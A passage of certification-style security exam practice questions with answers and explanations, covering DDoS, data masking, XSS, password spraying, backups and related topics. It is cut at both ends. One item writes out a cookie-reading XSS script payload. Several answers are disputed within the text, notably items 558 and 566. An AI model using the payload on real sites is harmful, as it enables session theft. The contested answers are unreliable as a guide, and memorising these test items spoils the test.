D. Reflected denial of service

A

D. Reflected denial of service

Here’s why:

Reflected Denial of Service (DDoS): This occurs when an attacker sends requests to a server with a spoofed source IP address, making it appear that the requests are coming from the victim's IP address. The server then responds to these requests, sending large amounts of data to the victim's IP address, overwhelming their network connection.

Symptoms Matching: In this scenario, the DNS server is experiencing inbound traffic flooding its network interface, despite minimal DNS queries being sent to it. This mismatch indicates that the server is likely being used as an amplifier in a DDoS attack. The server is responding to spoofed requests that appear to originate from the victim's network, thereby flooding the victim's network interface with unwanted traffic.

Other Options Considered: Concurrent session usage (option A) typically refers to the number of active sessions or connections, which doesn't fit the described scenario. Secure DNS cryptographic downgrade (option B) and on-path resource consumption (option C) are not directly related to the symptoms of a flooded network interface due to DDoS.

Therefore, option D (Reflected denial of service) best describes the situation where the DNS server is flooded with inbound traffic due to being used as an unwitting amplifier in a DDoS attack.

546
Q

An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to best satisfy both the CPO’s and the development team’s requirements?

A. Data purge
B. Data encryption
C. Data masking
D. Data tokenization

A

(Community C 59%, B 32%)

C. Data masking

Here’s why data masking is the most appropriate solution:

Data Masking: This technique involves transforming sensitive data within the development environment so that it is anonymized or obfuscated. This allows the development team to work with realistic data for testing and debugging purposes while ensuring that the actual PII is not exposed or used inappropriately.

Balancing Privacy and Functionality: Data masking strikes a balance by protecting sensitive information (in this case, PII) while still providing developers with data that resembles real-world scenarios. This enables them to adequately test functionality, simulate user interactions, and troubleshoot issues without compromising privacy or violating regulations.

Compliance and Security: By implementing data masking, the organization can comply with privacy regulations (such as GDPR, CCPA) and internal privacy policies enforced by the CPO, while also maintaining data security in the development environment.

While options like data purge (option A) and data encryption (option B) focus on removing or securing data, they may not allow the development team to continue their necessary testing activities effectively. Data tokenization (option D), while useful for securing sensitive data by replacing it with non-sensitive tokens, might not provide realistic test data that developers require.

Therefore, option C (Data masking) is the best choice to ensure both compliance with privacy requirements and support for development activities in the presence of sensitive PII data.

547
Q

A security analyst is investigating a malware incident at a company. The malware is accessing a command-and-control website at www.comptia.com. All outbound Internet traffic is logged to a syslog server and stored in /logfiles/messages. Which of the following commands would be best for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?

A. head -500 www.comptia.com | grep /logfiles/messages
B. cat /logfiles/messages | tail -500 www.comptia.com
C. tail -500 /logfiles/messages | grep www.comptia.com
D. grep -500 /logfiles/messages | cat www.comptia.com

A

C. tail -500 /logfiles/messages | grep www.comptia.com

Here’s why:

tail -500 /logfiles/messages: This command will retrieve the last 500 lines from the file /logfiles/messages, which contains the outbound Internet traffic logs.

grep www.comptia.com: The grep command is used to search for occurrences of the string www.comptia.com within the output obtained from tail. This will filter out and display only the lines that contain references to www.comptia.com, which in this case, would indicate outbound connections to the command-and-control website.

Let’s briefly discuss why the other options are not correct:

Option A: head -500 www.comptia.com | grep /logfiles/messages
    This command attempts to search the first 500 lines of a file named www.comptia.com and then grep for /logfiles/messages, which is not relevant to searching log files for traffic to www.comptia.com.

Option B: cat /logfiles/messages | tail -500 www.comptia.com
    This command would attempt to retrieve the last 500 lines from the www.comptia.com file, which is not the log file where the traffic data is stored.

Option D: grep -500 /logfiles/messages | cat www.comptia.com
    This command is syntactically incorrect and does not perform the intended search on the syslog file /logfiles/messages.

Therefore, option C is the correct choice as it effectively retrieves the recent log entries related to outbound traffic to www.comptia.com from the syslog file /logfiles/messages.

548
Q

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

A. Scanning
B. Alerting
C. Reporting
D. Archiving

A

A. Scanning

Here’s why:

Scanning: This refers to the process of systematically checking for vulnerabilities, weaknesses, or potential threats within a system or network. In this case, the automated process is designed to scan the entire environment regularly, likely using vulnerability scanning tools or scripts.

Automated Process: By automating the scanning process to run every morning, the systems administrator ensures that potential vulnerabilities are identified promptly and consistently.

Options like alerting (option B), reporting (option C), and archiving (option D) are related activities but do not directly describe the primary action of actively checking for vulnerabilities. Alerting involves notifying stakeholders of detected issues, reporting involves summarizing findings, and archiving involves storing data for future reference, none of which directly perform the initial act of scanning for vulnerabilities.

Therefore, option A (Scanning) best describes the activity conducted by the systems administrator in this scenario.

549
Q

An engineer is setting up a VDI environment for a factory location, and the business wants to deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment directly. Which of the following should the engineer select to meet these requirements?

A. Laptops
B. Containers
C. Thin clients
D. Workstations

A

C. Thin clients

Here’s why thin clients are suitable for this scenario:

Cost-Effective: Thin clients are typically less expensive than traditional desktops or laptops. They are designed to connect to a centralized VDI infrastructure where the actual computing is done on servers rather than locally on the client device. This reduces the hardware cost per user.

VDI Compatibility: Thin clients are specifically built to work with VDI environments. They have minimal local processing power and storage because most computing tasks are handled by the VDI servers. This makes them ideal for deploying a VDI solution in a cost-effective manner.

Shop Floor Environment: In factory locations, there might be environmental factors such as dust, temperature variations, and physical hazards that could potentially damage or affect traditional desktops or laptops. Thin clients, being simpler and more robust with fewer moving parts, are often more durable in such environments.

Options like laptops (option A) and workstations (option D) are typically more expensive and may not be necessary if the primary requirement is to access the VDI environment. Containers (option B) are a different technology used for application deployment and management, not for providing access to a VDI environment.

Therefore, option C (Thin clients) is the most appropriate choice for deploying a low-cost solution to enable users on the shop floor to log in to the VDI environment directly.

550
Q

A systems administrator receives the following alert from a file integrity monitoring tool:
The hash of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the last two months.
Which of the following most likely occurred?

A. The end user changed the file permissions.
B. A cryptographic collision was detected.
C. A snapshot of the file system was taken.
D. A rootkit was deployed.

A

D. A rootkit was deployed.

Here’s why:

File Integrity Change: File integrity monitoring tools are designed to detect unauthorized changes to critical system files, such as cmd.exe. A sudden change in the hash of a system file like cmd.exe indicates that the file has been altered.

No Patch Activity: Since no patches were applied recently, a legitimate update to cmd.exe through official channels (such as Windows Update) is unlikely. Therefore, the change in the file's hash is not due to a standard update process.

Rootkit Deployment: Rootkits are malicious software that are specifically designed to conceal their presence and activities on a system. They often replace or modify critical system files like cmd.exe to maintain stealth and control over the compromised system.

Options like the end user changing file permissions (option A), a cryptographic collision (option B), or a snapshot of the file system being taken (option C) are less likely explanations in this context. File permissions changes by end users typically do not alter the hash of system files like cmd.exe. Cryptographic collisions are extremely rare and not typically the cause of hash changes in system files. Taking a snapshot of the file system would not alter the hash of a specific file like cmd.exe unless the snapshot process itself was maliciously altering files.

Therefore, option D (A rootkit was deployed) is the most plausible explanation for the observed change in the hash of the cmd.exe file detected by the file integrity monitoring tool.

551
Q

A security analyst was asked to evaluate a potential attack that occurred on a publicly accessible section of the company’s website. The malicious actor posted an entry in an attempt to trick users into clicking the following:
https://www.c0mpt1a.com/contact-us/%3Fname%3D%3Cscript%3Ealert(docu…3C%2Fscript%3E
Which of the following was most likely observed?

A. DLL injection
B. Session replay
C. SQLi
D. XSS

A

D. XSS (Cross-Site Scripting)

Here’s why:

Cross-Site Scripting (XSS): XSS occurs when an attacker injects malicious scripts (such as JavaScript) into web pages viewed by other users. In this case, the malicious actor attempted to inject a script (<script>alert(document.cookie)</script>) into the website's URL parameters (name parameter in the query string). If this script executes when accessed, it could potentially compromise the security of users visiting the website by executing arbitrary JavaScript code in their browsers.

Characteristics of XSS: The URL manipulation seen (<script>alert(document.cookie)</script>) is characteristic of a reflected XSS attack, where the injected script is reflected back to the user's browser and executed within the context of the vulnerable web page.

Options like DLL injection (option A), session replay (option B), and SQL injection (option C) do not align with the context of the provided URL and the described attack scenario. DLL injection is a method of injecting malicious DLLs into processes, session replay involves capturing and replaying legitimate session data, and SQL injection involves manipulating SQL queries to execute unauthorized actions on a database.

Therefore, option D (XSS) is the most likely type of attack observed in this scenario where the malicious actor attempted to inject a JavaScript alert into the website’s URL parameters to exploit users accessing that URL.

552
Q

A company’s Chief Information Security Officer (CISO) recently warned the security manager that the company’s Chief Executive Officer (CEO) is planning to publish a controversial opinion article in a national newspaper, which may result in new cyberattacks. Which of the following would be best for the security manager to use in a threat model?

A. Hacktivists
B. White-hat hackers
C. Script kiddies
D. Insider threats

A

A. Hacktivists

Here’s why:

Hacktivists: Hacktivists are individuals or groups who use hacking techniques to promote political ends or to advance social causes. They often target organizations or individuals perceived as opposing their beliefs or causes. In this case, if the CEO's article is controversial enough to provoke strong reactions, hacktivists might target the company's systems in retaliation or to make a political statement.

Contextual Fit: The CEO's planned publication of a controversial article in a national newspaper suggests potential for ideological disagreement or public outcry, which could attract the attention of hacktivist groups looking to exploit or retaliate against the company's digital infrastructure.

Options like white-hat hackers (option B), who are ethical hackers focused on testing and improving security systems; script kiddies (option C), who are generally inexperienced hackers using pre-written scripts to attack systems; and insider threats (option D), who are employees or insiders with access to sensitive information, are less likely in this context.

Therefore, option A (Hacktivists) is the most appropriate choice for the security manager to consider when assessing potential threats stemming from the CEO’s upcoming publication.

553
Q

Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?

A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53

A

D. NIST 800-53

Here’s why:

NIST 800-53: This publication, titled "Security and Privacy Controls for Federal Information Systems and Organizations," provides a comprehensive catalog of security and privacy controls for U.S. federal information systems. It is developed by the National Institute of Standards and Technology (NIST) and outlines controls that are applicable to federal agencies and organizations handling federal information.

GDPR (General Data Protection Regulation): This regulation pertains to data protection and privacy for individuals within the European Union (EU) and European Economic Area (EEA). It does not specifically relate to U.S. federal information systems.

PCI DSS (Payment Card Industry Data Security Standard): This standard is focused on securing payment card information and is applicable to organizations handling payment card transactions. It does not pertain to U.S. federal information systems.

ISO 27000: This family of standards includes ISO 27001, which is a framework for information security management systems (ISMS). While it provides a broad set of controls and guidelines for information security, it is not specific to U.S. federal information systems as outlined in NIST 800-53.

Therefore, option D (NIST 800-53) is the correct answer for a catalog of security and privacy controls related to United States federal information systems.

554
Q

An analyst is concerned about data leaks and wants to restrict access to internet services to authorized users only. The analyst also wants to control the actions each user can perform on each service. Which of the following would be the best technology for the analyst to consider Implementing?

A. DLP
B. VPC
C. CASB
D. Content filtering

A

C. CASB (Cloud Access Security Broker)

Here’s why CASB is the most suitable choice:

Access Control: CASB solutions provide granular access control capabilities that allow organizations to enforce policies based on user identity and context. This includes restricting access to internet services to authorized users only, ensuring that only authenticated and authorized users can access specific cloud services.

Control over Actions: CASB solutions also offer comprehensive visibility and control over user actions within cloud applications and services. They can enforce policies that dictate what actions users are allowed to perform, such as uploading, downloading, sharing, or editing files within cloud services.

Data Leakage Prevention (DLP): While DLP (option A) focuses specifically on preventing unauthorized data exfiltration or leakage, CASB solutions often incorporate DLP capabilities as part of their feature set. This allows them to monitor and control data transfers to and from cloud services, thus addressing the analyst's concerns about data leaks effectively.

VPC (Virtual Private Cloud) and content filtering (option B and D) are more focused on network segmentation and controlling internet traffic based on content categories respectively, which do not directly address the requirement of controlling user actions on internet services with granular access control.

Therefore, option C (CASB) is the best technology for the analyst to consider implementing to achieve the goals of restricting access to internet services to authorized users and controlling user actions on each service effectively.

555
Q

A grocery store is expressing security and reliability concerns regarding the on-site backup strategy currently being performed by locally attached disks. The main concerns are the physical security of the backup media and the durability of the data stored on these devices. Which of the following is a cost-effective approach to address these concerns?

A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off-site.
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution.

A

D. Migrate to a cloud backup solution.

Explanation:

Cloud backup solution: This addresses both physical security and data durability concerns. Cloud providers often have robust physical security measures and data redundancy built into their infrastructure. Additionally, cloud backups are typically more durable and less prone to physical damage compared to on-site disks or tapes. Cloud storage can also be cost-effective, especially for businesses that do not want to invest in and manage additional hardware.

Enhance resiliency by adding a hardware RAID: While RAID can improve data durability by protecting against disk failures, it does not address the physical security concern of having backup media on-site.

Move data to a tape library and store the tapes off-site: This can improve physical security and durability, but it involves additional costs for tape management, off-site storage services, and potentially slower recovery times compared to cloud solutions.

Install a local network-attached storage: This can improve data durability within the local network but does not fully address physical security concerns since the backup media would still be on-site.

Therefore, migrating to a cloud backup solution (Option D) is the best cost-effective approach that addresses both the physical security and durability of backup data concerns.

556
Q

A security engineer needs to recommend a solution to defend against malicious actors misusing protocols and being allowed through network defenses. Which of the following will the engineer most likely recommend?

A. A content filter
B. A WAF
C. A next-generation firewall
D. An IDS

A

C. A next-generation firewall (NGFW)

Explanation:

Next-generation firewall (NGFW): NGFWs combine traditional firewall capabilities with advanced features such as deep packet inspection, intrusion prevention systems (IPS), application awareness and control, and the ability to block malware and exploits at the network level. NGFWs are specifically designed to detect and prevent sophisticated attacks that misuse protocols and get through basic network defenses.

Content filter: This primarily focuses on controlling the types of content that can be accessed by users, such as blocking websites with inappropriate material. It does not provide comprehensive protection against protocol misuse by malicious actors.

Web Application Firewall (WAF): A WAF is designed to protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. While it is effective against web-based attacks such as SQL injection and cross-site scripting (XSS), it does not cover all types of protocol misuse across the network.

Intrusion Detection System (IDS): An IDS monitors network traffic for suspicious activity and alerts administrators to potential threats. However, it does not actively block malicious traffic or prevent attacks; it only detects and alerts.

Given the requirement to defend against malicious actors misusing protocols and being allowed through network defenses, a next-generation firewall (NGFW) is the most comprehensive and effective solution.

557
Q

A company’s legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?

A. Data masking
B. Encryption
C. Geolocation policy
D. Data sovereignty regulation

A

C. Geolocation policy

Here’s why:

Geolocation Policy: This policy allows organizations to restrict access based on the geographical location of users. By implementing a geolocation policy, access to sensitive documents can be blocked or restricted from IP addresses originating in high-risk countries or regions identified by the company's legal department.

Effectiveness: Geolocation policies are effective because they directly prevent access based on the physical location of the user attempting to access the documents. This helps enforce compliance with legal and regulatory requirements that restrict access to sensitive information from certain jurisdictions.

Data masking (option A) involves obfuscating sensitive data within the application, which may protect against unauthorized access but does not specifically address geographical restrictions.

Encryption (option B) protects data by encoding it in such a way that only authorized parties with the decryption key can access it. While encryption is important for securing data in transit and at rest, it does not inherently prevent access based on geographical location.

Data sovereignty regulation (option D) refers to laws and regulations that dictate how data is stored and managed within specific jurisdictions, but it does not directly control or restrict access based on the geographical location of users.

Therefore, option C (Geolocation policy) is the most effective way to limit access to sensitive documents drafted in a SaaS application by individuals in high-risk countries, aligning with legal and compliance requirements regarding data access restrictions.

558
Q

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Choose two.)

A. Warm site
B. Generator
C. Hot site
D. Cold site
E. Cloud backups
F. UPS

A

(Community BF 44%, DE 40%)
The question is clearly implying an electricity problem. “The Chief Executive Officer wants to create a disaster recovery strategy to resolve THIS issue” meaning the outage issue.

B. Generator and F. UPS (Uninterruptible Power Supply)

Here’s why these options are cost-effective:

Generator (Option B): A generator can provide backup power during extended power outages. It is a more affordable option compared to maintaining a hot or warm site, which involves duplicating the entire IT infrastructure at a secondary location. Generators can be set up to automatically kick in when main power fails, providing continuous operation until power is restored.

UPS (Option F): An Uninterruptible Power Supply (UPS) is a device that provides short-term backup power during brief power interruptions or until a generator starts up. UPS units are generally inexpensive compared to setting up a dedicated disaster recovery site (hot or warm site). They ensure that critical systems remain operational during short outages and can bridge the gap until the generator comes online.

Warm site (Option A), hot site (Option C), cold site (Option D), and cloud backups (Option E) are generally more expensive options or involve ongoing operational costs that may exceed the budget constraints for a low-cost solution in this scenario.

Therefore, option B (Generator) and option F (UPS) are the most appropriate low-cost solutions to support the organization’s disaster recovery strategy in response to frequent power outages.

(Brain dump: D. Cold site, E. Cloud backups )
(Community BF 44%, DE 40%)

559
Q

A security analyst is reviewing the following logs:

[10:00:00 AM] Login rejected - username administrator - password Spring 2023
[10:00:00 AM] Login rejected - username jsmith - password Spring 2023
[10:00:00 AM] Login rejected - username guest - password Spring 2023
[10:00:00 AM] Login rejected - username cpolk - password Spring 2023
[10:00:00 AM] Login rejected - username fmartin - password Spring 2023

Which of the following attacks is most likely occurring?

A. Password spraying
B. Account forgery
C. Pass-the-hash
D. Brute-force

A

A. Password spraying

Here’s why:

Password Spraying: In a password spraying attack, the attacker tries a few commonly used passwords (in this case, "Spring 2023") against many accounts. This method avoids rapid or frequent login attempts that could trigger account lockouts or detection by intrusion detection systems.

Pattern in Logs: The logs show repeated login attempts at the same timestamp with different usernames but the same password. This pattern is typical of a password spraying attack where the attacker is attempting to gain unauthorized access to multiple accounts by guessing a commonly used password.

Account forgery (option B) typically involves creating or manipulating user accounts to gain unauthorized access, which is not evident from the provided logs.

Pass-the-hash (option C) involves an attacker obtaining hashed password values and using them to authenticate without needing to crack the hashes, which is not indicated by the provided logs.

Brute-force (option D) attacks involve systematically trying all possible combinations of passwords until the correct one is found, which would typically result in more varied password attempts rather than using the same password for multiple accounts in quick succession.

Therefore, option A (Password spraying) is the most likely attack occurring based on the information provided in the logs.

560
Q

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

A. DLP
B. SIEM
C. NIDS
D. WAF

A

D. WAF (Web Application Firewall)

Here’s why:

Parameter Manipulation Protection: A WAF is designed to inspect and filter HTTP/HTTPS requests to a web application or API. It can detect and prevent common attacks such as parameter manipulation, where attackers attempt to modify input parameters to exploit vulnerabilities or gain unauthorized access.

Security Controls: WAFs enforce security policies that can block or sanitize incoming requests, ensuring that only valid and expected parameters are accepted by the API endpoint. They can also detect abnormal patterns or anomalies in request parameters that may indicate malicious intent.

Focused Protection: While options like DLP (Data Loss Prevention, option A) focus on preventing data leakage and SIEM (Security Information and Event Management, option B) on collecting and analyzing security event logs, they do not specifically address the manipulation of parameters in API requests. NIDS (Network Intrusion Detection System, option C) monitors network traffic for suspicious activities but may not provide the granular protection needed at the application layer.

Therefore, option D (WAF) is the most appropriate solution to help protect against the attack where an unknown third party is manipulating parameters in a web API, providing effective defense at the application layer against such exploits.

561
Q

An application owner reports suspicious activity on an internal financial application from various internal users
within the past 14 days. A security analyst notices the following:
– Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.
– Internal users in question were changing their passwords frequently during that time period.
– A jump box that several domain administrator users use to connect to remote devices was recently compromised.
– The authentication method used in the environment is NTLM.
Which of the following types of attacks is most likely being used to gain unauthorized access?

A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay

A

A. Pass-the-hash

Here’s why:

Irregular Financial Transactions: Unauthorized users conducting financial transactions outside of regular business hours suggests they have gained access to internal accounts.

Frequent Password Changes: Internal users changing their passwords frequently could indicate an attempt to evade detection or mitigate the impact of compromised credentials.

Compromised Jump Box: The compromise of a jump box used by domain administrators suggests that attackers may have obtained privileged access, potentially through credential theft or exploitation.

Authentication Method (NTLM): NTLM (NT LAN Manager) authentication is vulnerable to pass-the-hash attacks. In this method, attackers capture hashed credentials from compromised systems and use them to authenticate without needing to crack passwords.

Given these indicators, the scenario aligns with the tactics commonly associated with pass-the-hash attacks, where attackers leverage captured hashed credentials (rather than plaintext passwords) to authenticate and gain unauthorized access to systems and applications.

Therefore, option A (Pass-the-hash) is the most likely type of attack being used to gain unauthorized access in this situation.

562
Q

During an incident, an EDR system detects an increase in the number of encrypted outbound connections from multiple hosts. A firewall is also reporting an increase in outbound connections that use random high ports. An analyst plans to review the correlated logs to find the source of the incident. Which of the following tools will best assist the analyst?

A. A vulnerability scanner
B. A NGFW
C. The Windows Event Viewer
D. A SIEM

A

D. A SIEM (Security Information and Event Management)

Here’s why:

Centralized Log Management: A SIEM collects and aggregates logs from various sources such as firewalls, EDR systems, servers, and network devices. It provides a centralized platform to correlate events and analyze them in context, which is crucial when investigating incidents that span multiple systems.

Correlation and Analysis: SIEM platforms use correlation rules to detect patterns and anomalies across logs. In this case, the SIEM can correlate the logs from the EDR system (detecting encrypted outbound connections) with logs from the firewall (reporting outbound connections on random high ports). This correlation helps identify potential sources and behaviors associated with the incident.

Alerting and Reporting: SIEMs provide capabilities for real-time alerting on suspicious activities and generating reports that aid in incident response and forensic analysis.

Options A, B, and C are less suitable in this context:

A. Vulnerability Scanner: Scans and identifies vulnerabilities in systems but does not provide the real-time correlation and analysis needed for incident response.

B. NGFW (Next-Generation Firewall): Provides advanced firewall capabilities including monitoring and filtering network traffic but does not typically provide centralized log management or correlation across diverse logs.

C. Windows Event Viewer: Provides logs specific to Windows systems but does not aggregate logs from multiple sources or offer the breadth of correlation and analysis capabilities required for cross-platform incident investigation.

Therefore, option D (SIEM) is the best tool to assist the analyst in reviewing correlated logs to identify the source of the incident involving encrypted outbound connections and increased outbound connections on random high ports.

563
Q

A company recently suffered a breach in which an attacker was able to access the internal mail servers and directly access several user inboxes. A large number of email messages were later posted online. Which of the following would best prevent email contents from being released should another breach occur?

A. Implement S/MIME to encrypt the emails at rest.
B. Enable full disk encryption on the mail servers.
C. Use digital certificates when accessing email via the web.
D. Configure web traffic to only use TLS-enabled channels.

A

A. Implement S/MIME to encrypt the emails at rest.

Here’s why this option is appropriate:

S/MIME Encryption: S/MIME (Secure/Multipurpose Internet Mail Extensions) provides end-to-end encryption for emails. This means that emails are encrypted before they leave the sender's mailbox and remain encrypted until they are decrypted by the intended recipient. Encrypting emails at rest ensures that even if attackers gain access to the mail servers and user inboxes, they cannot read the contents of the emails without the decryption keys.

Protection of Email Contents: By implementing S/MIME, the company can protect sensitive email contents from unauthorized access, even in the event of a breach where attackers manage to compromise the internal mail servers.

Option B (Enable full disk encryption on the mail servers) is a good security practice for protecting data at rest on the servers themselves, but it does not specifically protect email contents transmitted over the network or stored in user inboxes once decrypted.

Option C (Use digital certificates when accessing email via the web) enhances authentication and secure access to email services but does not directly address the protection of email contents from being released in the event of a breach.

Option D (Configure web traffic to only use TLS-enabled channels) improves the security of email communications in transit by encrypting traffic between clients and servers, but it does not address the protection of email contents at rest.

Therefore, option A (Implement S/MIME to encrypt the emails at rest) is the most effective measure to prevent email contents from being released in case of another breach involving unauthorized access to internal mail servers and user inboxes.

564
Q

A company hired a consultant to perform an offensive security assessment covering penetration testing and social engineering. Which of the following teams will conduct this assessment activity?

A. White
B. Purple
C. Blue
D. Red

A

D. Red Team

Here’s why:

Red Team: The Red Team is responsible for simulating real-world attacks on an organization's systems, networks, and personnel. This includes conducting penetration testing to identify vulnerabilities in technical systems and social engineering to assess human vulnerabilities.

Penetration Testing: The Red Team performs penetration testing to actively exploit identified vulnerabilities in a controlled manner to assess the effectiveness of defensive measures.

Social Engineering: Red Teams also engage in social engineering techniques to test the organization's security awareness, policies, and procedures by attempting to manipulate employees into disclosing sensitive information or performing actions that compromise security.

Options A (White Team), B (Purple Team), and C (Blue Team) do not typically perform offensive security assessments like penetration testing and social engineering:

White Team: Focuses on internal compliance, policies, and ensuring adherence to security standards.

Purple Team: Collaborates between Red (offensive) and Blue (defensive) teams to share knowledge and improve overall security posture through joint testing and assessments.

Blue Team: Focuses on defending against and responding to security incidents, monitoring systems, and maintaining the organization's security infrastructure.

Therefore, option D (Red Team) is the correct team that will conduct the offensive security assessment, including penetration testing and social engineering, for the company hired by the consultant.

565
Q

Which of the following exercises should an organization use to improve its incident response process?

A. Tabletop
B. Replication
C. Failover
D. Recovery

A

A. Tabletop Exercises

A. Tabletop Exercises: These are simulations of an emergency scenario where key stakeholders discuss their roles and responses. They’re effective for testing plans, identifying gaps, and training staff without disrupting operations.

B. Replication: This involves duplicating critical systems or data to ensure availability and continuity. While important for resilience, it’s more about maintaining operations rather than directly improving incident response.

C. Failover: This refers to the process of switching to a redundant or standby system upon detecting a failure. It’s crucial for minimizing downtime but isn’t specifically an exercise for improving incident response procedures.

D. Recovery: This involves restoring systems, services, and data to their normal state after an incident. While essential, it’s reactive rather than proactive for process improvement.

Conclusion: The exercise most directly aimed at improving incident response processes is A. Tabletop Exercises. These exercises help refine procedures, identify weaknesses, and train personnel in a controlled setting, thereby enhancing the organization’s readiness to respond effectively to incidents.

566
Q

An attacker is attempting to harvest user credentials on a client’s website. A security analyst notices multiple attempts of random usernames and passwords. When the analyst types in a random username and password, the logon screen displays the following message:
The username you entered does not exist.
Which of the following should the analyst recommend be enabled?

A. Input valuation
B. Obfuscation
C. Error handling
D. Username lockout

A

(Brain dump : C. Error handling)
(Community : C 76%, D 22%)

The message “The username you entered does not exist” gives away too much information and could aid an attacker in their attempts to gain unauthorized access. A better approach would be to use a generic error message such as “Invalid username or password.” This way, the application does not reveal whether it was the username, the password, or both that were incorrect, making it harder for an attacker to guess valid credentials

D. Username lockout

Based on the scenario described, where an attacker is attempting to harvest user credentials through multiple random username and password combinations, and the system responds with a specific message indicating whether the username exists or not, the analyst should recommend enabling Username Lockout.

Here’s the reasoning behind this recommendation:

Username Lockout: This security measure locks out a username after a certain number of failed login attempts. It helps mitigate brute-force attacks where attackers try multiple username/password combinations until they find a valid one. By locking out the username after a few unsuccessful attempts (commonly 3 to 5), the system prevents further login attempts for a specified period or until manually unlocked by an administrator.

Error Handling: While important for providing clear and secure error messages, error handling alone wouldn't mitigate the risk posed by brute-force attacks. In this case, the error message "The username you entered does not exist" already provides some feedback to the attacker, but locking out the username after repeated failed attempts would effectively thwart the brute-force attempt.

Therefore, the most appropriate recommendation in this context to enhance security against credential harvesting attempts would be D. Username Lockout.

567
Q

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system.
Which of the following best describes the actions taken by the organization?

A. Exception
B. Segmentation
C. Risk transfer
D. Compensating controls

A

D. Compensating controls

Explanation:

Compensating controls are alternative measures implemented to meet security requirements when the primary controls are not feasible or possible. In this case, disabling unneeded services and placing a firewall in front of the legacy system are measures taken to reduce risk and protect the system, compensating for the fact that the legacy system might not have the necessary built-in security features.

Other options explained:

Exception: This refers to allowing a deviation from a security policy or standard, typically granted for a specific period or under certain conditions. The actions described do not indicate granting an exception.
Segmentation: This involves dividing a network into smaller segments to control access and reduce the scope of security breaches. While a firewall might be part of segmentation, the primary action described is implementing compensating controls.
Risk transfer: This involves shifting the risk to another party, typically through insurance or outsourcing. The actions taken here do not involve transferring the risk but rather implementing additional controls to mitigate it.
568
Q

Which of the following describes the ability of code to target a hypervisor from inside a guest OS?

A. Fog computing
B. VM escape
C. Software-defined networking
D. Image forgery
E. Container breakout

A

B. VM escape.

Here’s why:

VM Escape: This term specifically describes a scenario where an attacker exploits vulnerabilities in virtualization software to break out from a guest virtual machine (VM) and gain unauthorized access to the host system or other VMs running on the same hypervisor. It involves leveraging flaws in the virtualization layer to breach the isolation between guest VMs and the host system.

Fog computing: This refers to a decentralized computing infrastructure where data, compute, storage, and applications are distributed in the most logical, efficient place between the data source and the cloud. It's not directly related to the scenario described.

Software-defined networking: This involves managing network behavior through software abstractions, typically decoupled from the underlying hardware. It's not related to targeting a hypervisor from inside a guest OS.

Image forgery: This generally refers to the creation or manipulation of images to deceive or mislead viewers, such as in the context of digital images or documents. It's unrelated to targeting a hypervisor.

Container breakout: This refers to an attack where an attacker gains access to the underlying host operating system from within a container. It's specific to containerization environments like Docker rather than virtualization environments like VMs and hypervisors.

Therefore, the correct term that describes the ability of code to target a hypervisor from inside a guest OS is B. VM escape.

569
Q

A local server recently crashed and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate. The current solution appears to do a full backup every night.
Which of the following would use the least amount of storage space for backups?

A. A weekly, incremental backup with daily differential backups
B. A weekly, full backup with daily snapshot backups
C. A weekly, full backup with daily differential backups
D. A weekly, full backup with daily incremental backups

A

D. A weekly, full backup with daily incremental backups.

Here’s why:

Weekly, full backup: This strategy involves taking a complete backup of all data once a week. Full backups capture all data, ensuring comprehensive recovery capability.

Daily incremental backups: Incremental backups only store changes made since the last backup, whether it was a full backup or an incremental backup. This results in smaller backup sizes compared to differential backups.

Let’s briefly compare this with the other options for clarity:

A. Weekly, incremental backup with daily differential backups: In this approach, incremental backups would store changes since the last backup, but differential backups would store changes since the last full backup. Differential backups typically grow larger over time compared to incremental backups because they accumulate changes since the last full backup.

B. Weekly, full backup with daily snapshot backups: Snapshot backups typically capture the state of the system at a specific point in time, but they often require significant storage space if taken daily, especially if they are full snapshots.

C. Weekly, full backup with daily differential backups: Differential backups accumulate changes since the last full backup, so they can grow larger over time, especially if changes are substantial each day.

Therefore, D. A weekly, full backup with daily incremental backups is generally the most storage-efficient option because it minimizes the amount of data stored in each backup iteration, focusing only on changes made since the last backup. This approach balances storage efficiency with the ability to restore from a weekly full backup, ensuring both comprehensive backups and efficient use of storage space.

570
Q

A security analyst discovers several jpg photos from a cellular phone during a forensics investigation involving a compromised system. The analyst runs a forensics tool to gather file metadata. Which of the following would be part of the images if all the metadata is still intact?

A. The GPS location
B. When the file was deleted
C. The total number of print jobs
D. The number of copies made

A

A. The GPS location

Here’s why:

GPS location: Many modern smartphones embed GPS coordinates into the metadata (EXIF data) of photos taken with the device. This information can reveal where the photos were taken, providing geographic coordinates of the location.

Let’s briefly review the other options:

B. When the file was deleted: This information is not typically stored in the metadata of an image file. File deletion timestamps are managed by the filesystem and are not part of image metadata.

C. The total number of print jobs: Image files do not typically contain information about print jobs. Print job information is specific to print logs or printer management systems, not embedded within image metadata.

D. The number of copies made: Similarly, the number of copies made of an image file is not stored in the metadata of the image itself. It would be managed externally through logging or tracking systems.

Therefore, among the options provided, A. The GPS location is the metadata that could be part of the images if all metadata is intact, assuming the photos were taken with a device that records GPS coordinates in the EXIF data.

571
Q

A financial analyst is expecting an email containing sensitive information from a client. When the email arrives the analyst receives an error and is unable to open the encrypted message. Which of the following is the most likely cause of the issue?

A. The S/MIME plug-in is not enabled
B. The SSL certificate has expired
C. Secure IMAP was not implemented
